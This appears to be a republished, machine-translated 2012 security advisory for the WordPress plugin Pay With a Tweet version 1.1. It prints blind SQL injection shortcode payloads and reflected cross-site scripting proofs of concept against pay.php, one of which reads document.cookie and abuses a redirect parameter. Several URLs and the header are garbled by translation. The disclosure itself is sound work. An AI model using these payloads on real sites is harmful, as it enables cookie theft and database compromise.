Wordpress plugin Pay With a Tweet <= 1.1 a plurality of defect and repair-vulnerability warning-the black bar safety net

2012-01-09T00:00:00
ID MYHACK58:62201232858
Type myhack58
Reporter 佚名
Modified 2012-01-09T00:00:00

Description

Title: Wordpress Pay With Tweet plugin < = 1.1 Multiple Vulnerabilities

Author: Gianluca Brindisi (gATbrindi. si @gbrindisi http://brindi.si/g/)

Download address: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip

Affect version: 1.1

1) Blind SQL Injection in shortcode:

Short code parameter 'id' is prone to blind sqli,

you need to be able to write a post/page to exploit this:

[paywithtweet id="1' AND 1=2"]

[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in pay.php

http://www.2cto.com /wp-content/plugins/pay-with-tweet.php/pay.php

After connecting to twitter:

? link=&amp; 2 2></input>[XSS]

After submitting the tweet:

? title=[XSS]&dl=[REDIRECT-TO-URL]%2 7)">[XSS]

The final download link will be replaced with [REDIRECT-TO-URL]

POC: pay. php? link=%2 2></input><script>alert(document. cookie)</script>&title=<script>alert(document. cookie)</script>&dl=http://brindi. si%2 7"><script>alert(document. cookie)</script>